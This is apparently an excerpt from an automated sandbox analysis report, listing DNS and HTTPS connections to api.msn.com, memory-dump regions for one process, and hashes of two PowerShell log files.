US 8.8.8.8:53 96.108.152.52.in-addr.arpa udp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp

Files

memory/1936-134-0x00000247489C0000-0x00000247489E2000-memory.dmp

memory/1936-138-0x00000247489B0000-0x00000247489B2000-memory.dmp

memory/1936-137-0x00007FFC4F0B3000-0x00007FFC4F0B5000-memory.dmp

memory/1936-139-0x00000247489B3000-0x00000247489B5000-memory.dmp

memory/1936-140-0x00000247489B6000-0x00000247489B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c93edbabbce4bb611c1104858d23397
SHA1 73f1340aaa9d8e00de24c4fdd7146a7eafa93a88
SHA256 6954149f9b78047b355b512f69ce2a7a34c8c3d3372e58d75f5e7c68d62e941f
SHA512 fbc1a96606ab62185e3e94b084dceb5b8948651099003f3fc7cf63815de3469bb7d88d54a7da75e938a0e02c921788352185072f6c199525ad33de5719e75f8e